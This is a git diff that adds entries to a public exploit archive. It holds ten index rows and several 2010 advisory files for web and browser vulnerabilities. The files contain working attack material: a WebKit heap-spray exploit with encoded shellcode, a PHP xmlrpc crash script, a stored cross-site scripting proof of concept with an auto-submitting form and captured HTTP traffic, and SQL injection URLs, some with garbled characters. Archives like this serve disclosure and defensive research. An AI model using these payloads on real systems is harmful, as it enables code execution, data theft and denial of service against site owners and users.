pythonmaster41
diff --git a/‎files.csv‎
Lines changed: 10 additions & 0 deletions b/‎files.csv‎
Lines changed: 10 additions & 0 deletions
diff --git a/‎platforms/asp/webapps/33758.txt‎
Lines changed: 7 additions & 0 deletions b/‎platforms/asp/webapps/33758.txt‎
Lines changed: 7 additions & 0 deletions
diff --git a/‎platforms/linux/remote/33752.html‎
Lines changed: 9 additions & 0 deletions b/‎platforms/linux/remote/33752.html‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎platforms/php/dos/33755.php‎
Lines changed: 14 additions & 0 deletions b/‎platforms/php/dos/33755.php‎
Lines changed: 14 additions & 0 deletions
diff --git a/‎platforms/php/webapps/33748.txt‎
Lines changed: 273 additions & 0 deletions b/‎platforms/php/webapps/33748.txt‎
Lines changed: 273 additions & 0 deletions
diff --git a/‎platforms/php/webapps/33749.txt‎
Lines changed: 13 additions & 0 deletions b/‎platforms/php/webapps/33749.txt‎
Lines changed: 13 additions & 0 deletions
@@ -30398,3 +30398,13 @@ id,file,description,date,author,platform,type,port
 33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
 33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privileges Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
 33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0
+33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0
+33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS Multiple SQL Injection Vulnerabilities",2010-03-11,MustLive,php,webapps,0
+33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 'BASEPATH' Multiple Remote File Include Vulnerabilities",2010-03-11,eidelweiss,php,webapps,0
+33752,platforms/linux/remote/33752.html,"WebKit 1.2.x Right-to-Left Displayed Text Handling Memory Corruption Vulnerability",2010-03-11,wushi,linux,remote,0
+33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host 'topic.php' SQL Injection Vulnerability",2010-03-12,Pr0T3cT10n,php,webapps,0
+33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 'db_create.php' Cross Site Scripting Vulnerability",2010-03-12,Liscker,php,webapps,0
+33755,platforms/php/dos/33755.php,"PHP <= 5.3.2 xmlrpc Extension Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
+33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component 'id' Parameter SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
+33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component 'maintree' Parameter Cross-Site Scripting Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
+33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS 'manager/textbox.asp' SQL Injection Vulnerability",2010-03-15,Isfahan,asp,webapps,0
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38719/info
+
+Zigurrat Farsi CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/manager/textbox.asp?id=' 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38689/info
+
+WebKit is prone to a remote memory-corruption vulnerability; fixes are available.
+
+Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
+
+This issue was previously documented in BID 38671 (Apple Safari Prior to 4.0.5 Multiple Security Vulnerabilities) but has been given its own record to better document it.
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <HTML lang="en"> <HEAD> <script type="text/javascript">//<![CDATA[ function fuzz_load(){ spray2(); e=document.getElementsByTagName("FORM")[0]; e.previousSibling.dir="rtl"; //e.previousSibling.style="font-size:111px;"; setTimeout('fuzz_timer_0();',1); } function spray2(){ var shellcode ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; } function calc(){ var s0 ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var addr1= unescape("%u9090%u9090"); var addr2= "\uc5c6\uc7c9"; var addr3="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr4="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr5="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr6="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; } function fuzz_timer_0(){ e=document.getElementsByTagName("NOBR")[0]; e.innerHTML=''; calc(); document.lastChild.normalize(); } //]]> </script> <code>1111 <AREA>13333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 <FORM > <NOBR /><BIG /> </FORM> </AREA> </code> </A> </HEAD> <BODY dir="rtl" onload="fuzz_load();"> </BODY> </HTML> 
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/38708/info
+
+PHP's xmlrpc extension library is prone to multiple denial-of-service vulnerabilities because it fails to properly handle crafted XML-RPC requests.
+
+Exploiting these issues allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable library.
+
+PHP 5.3.1 is vulnerable; other versions may also be affected. 
+
+<?php
+$req = '<?xml version="1.0"?>
+<methodCall>
+   </methodCall>';
+    $result = xmlrpc_decode_request( $req, $frop );
+?>
@@ -0,0 +1,273 @@
+source: http://www.securityfocus.com/bid/38657/info
+
+AneCMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+AneCMS 1.0 is vulnerable; other versions may also be affected. 
+
+                                     =======================================================================
+     
+                                                  ANE CMS 1 Persistent XSS Vulnerability
+   
+                                     =======================================================================
+     
+                                                                   by
+     
+                                                              Pratul Agrawal
+   
+     
+     
+  # Vulnerability found in- Admin module
+     
+  # email         Pratulag@yahoo.com
+     
+  # company       aksitservices
+     
+  # Credit by     Pratul Agrawal
+   
+  # Software      ANE CMS 1
+  
+  # Category      CMS / Portals
+  
+  # Plateform     php
+    
+     
+     
+  #   Proof of concept   #
+   
+  Targeted URL:  http://server/acp/index.php?p=cfg&m=links
+    
+   
+  In ADD LINKS Field provide the malicious script to store in the Database.
+ 
+  That is-
+ 
+                      <html>
+ 
+                          <body>
+ 
+                             <form name="XYZ" action="http://server/acp/index.php?p=cfg&m=links&id=0" method="post">
+ 
+                                    <input type=hidden name="name" value=""><script>alert("XSS")</script>">
+ 
+                                    <input type=hidden name="link" value=""><script>alert("XSS")</script>">
+ 
+                                    <input type=hidden name="type" value="1">
+               
+                                    <input type=hidden name="view" value="0">
+ 
+                             </form>
+ 
+                               <script>
+ 
+                                 document.XYZ.submit();
+ 
+                               </script>
+ 
+                          </body>
+ 
+                        </html>
+ 
+ 
+  =======================================================================
+  Request -
+  =======================================================================
+  POST /acp/index.php?p=cfg&m=links&id=0 HTTP/1.1
+  Host: server
+  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
+  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+  Accept-Language: en-us,en;q=0.5
+  Accept-Encoding: gzip,deflate
+  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+  Keep-Alive: 300
+  Proxy-Connection: keep-alive
+  Referer: http://server/acp/index.php?p=cfg&m=links
+  Cookie: PHPSESSID=200fecb6b36334b983ebe251d11a5df9
+  Content-Type: application/x-www-form-urlencoded
+  Content-Length: 41
+ 
+  name="><script>alert("XSS")</script>&link="><script>alert("XSS")</script>&type=1&view=0
+  
+  =======================================================================
+  =======================================================================
+  Response-
+  =======================================================================
+  HTTP/1.1 200 OK
+  Date: Thu, 11 Mar 2010 06:59:03 GMT
+  Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
+  Expires: Thu, 19 Nov 1981 08:52:00 GMT
+  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+  Pragma: no-cache
+  Vary: Accept-Encoding
+  Content-Type: text/html; charset: utf-8
+  Content-Length: 7771
+ 
+&#65279;&#65279;<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<title>Transdmin Light</title>
+ 
+<!-- CSS -->
+<link href="./skins/aaa/css/transdmin.css" rel="stylesheet" type="text/css" media="screen" />
+<!--[if IE 6]><link rel="stylesheet" type="text/css" media="screen" href="./skins/aaa/css/ie6.css" /><![endif]-->
+<!--[if IE 7]><link rel="stylesheet" type="text/css" media="screen" href="./skins/aaa/css/ie7.css" /><![endif]-->
+ 
+<!-- JavaScripts-->
+<link rel="stylesheet" type="text/css" href="http://server/system/js/jquery.jgrowl.css" media="screen"/> <script type="text/javascript" src="http://server/system/js/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://server/system/js/jquery.jgrowl_minimized.js"></script>
+<style>div.jGrowl div.green {
+background-color:       #00D400;
+color:                  navy;
+    }</style>
+</head>
+ 
+<body>
+     
+    <div id="wrapper">
+        <!-- h1 tag stays for the logo, you can use the a tag for linking the index page -->
+        <h1><a href="#"><span>Administration</span></a></h1>
+ 
+        <!-- You can name the links with lowercase, they will be transformed to uppercase by CSS, we prefered to name them with uppercase to have the same effect with disabled stylesheet -->
+        <ul id="mainNav">
+            <li><a href="index.php">Dashboard</a></li>
+            <li><a href="?p=cfg">Configuration</a></li>
+            <li><a href="?p=tpl">Design</a></li>
+            <li><a href="?p=mod">Modules</a></li>
+            <li class="logout"><a href="#">Logout Admin</a></li>
+        <li class="logout"><a href="../index.php">CMS</a></li>
+        </ul>
+        <!-- // #end mainNav -->
+ 
+        <div id="containerHolder">
+            <div id="container">
+    <div id="sidebar">
+         
+    <ul class="sideNav">
+                                <li><a href="?p=cfg">Show Setting</a></li>
+                                <li><a href="?p=cfg&m=mod">Modify Setting</a></li>
+                                <li><a href="?p=cfg&m=links">Links Management</a></li>
+                                <li><a href="?p=cfg&m=reposerver">Repository Server</a></li>
+                            </ul>
+         
+    </div>
+     
+                <h2><a href="#">Configuration</a> � <a href="#" class="active">Links</a></h2>
+ 
+                <div id="main"><br>
+ 
+                <form action="?p=cfg&m=links&id=0" class="jNice" method="POST">
+ 
+<h3>Aggiungi un nuovo Link</h3>
+                <fieldset><p><label>Nome link:</label><input type="text" class="text-long" name="name" value=""/></p>
+                <p><label>Nome link:</label><input type="text" class="text-long" name="link" value=""/></p>
+<p><label>Tipo Link:</label><input type="radio" name="type" value="1" checked>Barra Links <input type="radio" name="type" value="2">Menu Links</p>
+ 
+<p><label>Accesso:</label>
+                <select name="view">
+                        <option value="0">Visible only to guests</option>
+                        <option value="1">Visible to all</option>
+                        <option value="2">Visible only to members</option>
+                        <option value="3">Visible only to admins</option>
+                </select>
+                </p>
+                 
+                <input type="submit" value="Send" />
+</fieldset>
+                        </form>
+ 
+<table cellpadding="0" cellspacing="0">
+                <tr>
+                                <td>Name</td>
+                <td>Link</td>
+                 
+                                 <td>Options</td>
+                            </tr>
+                            <tr><td colspan="4">Bar Links</td></tr>
+                                <tr class="odd">
+                                <td>Home</td>
+                <td>index.php</td>
+                 
+                <td><a href="?p=cfg&m=links&a=modify&id=1">Modify</a> <a href="?p=cfg&m=links&a=delete&id=1">Delete</a> <a href="?p=cfg&m=links&a=move&type=down&id=1">Move Down</a></td>
+                            </tr>
+                            <tr class="odd">
+                                <td>Blog</td>
+                <td>blog</td>
+                 
+                <td><a href="?p=cfg&m=links&a=modify&id=2">Modify</a> <a href="?p=cfg&m=links&a=delete&id=2">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=2">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=2">Move Down</a></td>
+                            </tr>
+                            <tr class="odd">
+                                <td>Registrati</td>
+                <td>register</td>
+                 
+                <td><a href="?p=cfg&m=links&a=modify&id=4">Modify</a> <a href="?p=cfg&m=links&a=delete&id=4">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=4">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=4">Move Down</a></td>
+                            </tr>
+                            <tr class="odd">
+                                <td>ACP</td>
+                <td>acp</td>
+                 
+                <td><a href="?p=cfg&m=links&a=modify&id=5">Modify</a> <a href="?p=cfg&m=links&a=delete&id=5">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=5">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=5">Move Down</a></td>
+                            </tr>
+                            <tr class="odd">
+                                <td>Widgets</td>
+                <td>index.php?modifywidgets</td>
+                 
+                <td><a href="?p=cfg&m=links&a=modify&id=6">Modify</a> <a href="?p=cfg&m=links&a=delete&id=6">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=6">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=6">Move Down</a></td>
+                            </tr>
+                            <tr class="odd">
+                                <td>master</td>
+                <td>master.asp</td>
+                 
+                <td><a href="?p=cfg&m=links&a=modify&id=38">Modify</a> <a href="?p=cfg&m=links&a=delete&id=38">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=38">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=38">Move Down</a></td>
+                            </tr>
+                            <tr class="odd">
+                                <td>"><script>alert("XSS")</script></td>
+                <td>"><script>alert("XSS")</script></td>
+                 
+                <td><a href="?p=cfg&m=links&a=modify&id=39">Modify</a> <a href="?p=cfg&m=links&a=delete&id=39">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=39">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=39">Move Down</a></td>
+                            </tr>
+            <tr><td colspan="4">Menu Links</td></tr>
+                                <tr class="odd">
+                                <td>home</td>
+                <td>index.php</td>
+                 
+                <td><a href="?p=cfg&m=links&a=modify&id=14">Modify</a> <a href="?p=cfg&m=links&a=delete&id=14">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=14">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=14">Move Down</a></td>
+                            </tr>
+                            <tr class="odd">
+                                <td>Blog</td>
+                <td>blog</td>
+                 
+                <td><a href="?p=cfg&m=links&a=modify&id=19">Modify</a> <a href="?p=cfg&m=links&a=delete&id=19">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=19">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=19">Move Down</a></td>
+                            </tr>
+                                    </table>
+<br />
+</div>
+ 
+                 
+                <!-- // #main -->
+ 
+                <div class="clear"></div>
+            </div>
+            <!-- // #container -->
+        </div>
+        <!-- // #containerHolder -->
+ 
+        <p id="footer">Feel free to use and customize it. <a href="http://server">Credit is appreciated.</a></p>
+    </div>
+    <!-- // #wrapper -->
+     
+                    <script type="text/javascript">
+                     $(function()
+            {
+            });</script>
+</body>
+</html>
+ 
+  
+=======================================================================
+  
+  
+   After completion Just Refres the page and the script get executed again and again.
+   
+   
+   #If you have any questions, comments, or concerns, feel free to contact me.
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38658/info
+
+ARTIS ABTON CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example URIs are available:
+
+http://www.example.com/rus/details/�??+benchmark(10000,md5(now()))+�??/
+
+http://www.example.com/rus/referaty/1'+benchmark(10000,md5(now()))-�??1/
+
+http://www.example.com/rus/�??+benchmark(10000,md5(now()))+�??/